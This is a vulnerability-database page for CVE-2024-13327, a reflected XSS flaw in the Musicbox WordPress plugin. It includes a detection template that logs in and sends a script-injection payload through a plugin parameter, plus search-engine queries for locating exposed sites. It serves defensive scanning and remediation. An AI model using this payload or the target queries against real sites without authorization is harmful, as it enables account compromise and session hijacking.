/Vulnerability Library

Musicbox WordPress - Reflected XSS

CVE-2024-13327
Verified

Description

contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.

Severity

Medium

CVSS Score

6.1

Exploit Probability

2%

Published Date

February 7, 2026

Template Author

sourabh-sahu

CVE-2024-13327.yaml
id: CVE-2024-13327

info:
  name: Musicbox WordPress - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/abc8f3e1-2aee-44f0-8ecd-0ea424c0540a/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13327
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13327
    cwe-id: CWE-79
    epss-score: 0.02069
    epss-percentile: 0.84145
    cpe: cpe:2.3:a:webdesignby:musicbox:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.component:"WordPress"
    fofa-query: body="webdesignby-musicbox"
  tags: cve,cve2024,wordpress,wp,wp-plugin,musicbox,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=webdesignby-musicbox&webdesignby-musicbox-filter=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","musicbox")
        condition: and
# digest: 4a0a0047304502205276e3a2382a3119652578b33db348ce169d06f540279bc2cf1fff171645cba602210084f29d1634401e0bf6bdebbe708285335f842e817d844a4b407257d3313ce4ee:922c64590222798bb761d5b6d8e72950
6.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2024-13327
CWE ID:
cwe-79

References

https://wpscan.com/vulnerability/abc8f3e1-2aee-44f0-8ecd-0ea424c0540a/https://nvd.nist.gov/vuln/detail/CVE-2024-13327

Remediation Steps

Update to the latest version of the plugin where the issue is fixed.